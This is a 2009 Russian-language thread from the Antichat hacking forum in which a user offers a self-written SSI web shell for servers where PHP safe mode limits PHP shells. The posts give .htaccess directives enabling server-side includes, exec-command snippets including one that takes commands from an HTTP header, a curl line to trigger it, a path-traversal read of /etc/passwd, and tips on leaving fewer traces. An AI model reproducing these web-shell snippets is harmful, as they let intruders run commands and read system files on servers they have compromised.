ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 16.11.2009, 22:49
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Цитата:
Да, разумеется.
Т.е. никогда
 
Ответить с цитированием

  #12  
Старый 10.12.2009, 22:46
Аватар для Root-access
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию


Web-шелл, написанный на shtml.
Автор - я.
Может весьма пригодиться, когда в конфигурации PHP стоит Safe-Mode=ON или какие-то функции отключены, то есть php-шелл не полнофункционален.

Функционал:

+ Общая информация
+ Все переменные окружения
+ Выполнение shell-кода
+ Просмотр файлов (cat)
+ SSI-инклуд произвольных файлов

Для того, чтобы mod_include работал, в .htaccess должно быть прописано (если соответствующая конфигурация не установлена в httpd.conf):

Код:
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Includes
Скачать

Последний раз редактировалось Root-access; 10.12.2009 в 22:58..
 
Ответить с цитированием

  #13  
Старый 10.12.2009, 23:00
Аватар для ghostwizard
ghostwizard
Участник форума
Регистрация: 04.12.2005
Сообщений: 202
Провел на форуме:
414834

Репутация: 99
По умолчанию

2 Root-access

А шелл выложить без регистрации не понятно на каком форуме возможно?

update: хм, теперь нормально.
 
Ответить с цитированием

  #14  
Старый 10.12.2009, 23:09
Аватар для Xcontrol212
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию

шелл очень сырой имхо,надо доработать,все основывается на командной строке
 
Ответить с цитированием

  #15  
Старый 10.12.2009, 23:42
Аватар для Root-access
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Цитата:
Сообщение от Xcontrol212  
шелл очень сырой имхо,надо доработать,все основывается на командной строке

Ну с SSI мало что сделаешь, разумеется всё основывается на командной строке, на то это и шелл.
По-моему наоборот, там даже лишнее, в принципе одной строки даже хватило бы)

Кстати: команды со спецсимволами слешируются, поэтому их лучше вписывать в сам код, добавив строчку:

Код:
<!--exec cmd=">команда<" -->
 
Ответить с цитированием

  #16  
Старый 26.12.2009, 02:57
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

блин неужто сработало где Included file: /../../../../../../../etc/passwd ?

ЗЫ вобще юзать гет и палево в query_string- некошерно
Цитата:
<!--#exec cmd=$HTTP_CMD -->
Цитата:
curl -H 'CMD: id' http://localhost/ssishell.shtml

Последний раз редактировалось ShAnKaR; 26.12.2009 в 03:27..
 
Ответить с цитированием

  #17  
Старый 26.12.2009, 21:04
Аватар для Root-access
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Цитата:
Сообщение от ShAnKaR  
блин неужто сработало где Included file: /../../../../../../../etc/passwd ?

ЗЫ вобще юзать гет и палево в query_string- некошерно

Хм, нет конечно, не сработало. Я перепутал - /etc/passwd должен был не инклудиться, а идти в cat.

Да, некошерно конечно. Вообще можно переписать весь шелл в связке с javascript, чтоб не было такого палева.
С другой стороны, самое главное в этом шелле - командная строка. Не знаю, нужно ли вообще-то что-то большее.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перевод описания плагинов w3af Kuzya Статьи 4 07.06.2009 09:13
63% web-сайтов содержат опасные уязвимости Suicide Мировые новости 4 24.05.2009 21:51
Дешевый Хостинг SimBa Социальные сети 15 03.05.2009 14:54
В Windows Mobile найдено две уязвимости ground_zero Мировые новости 1 06.02.2007 11:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ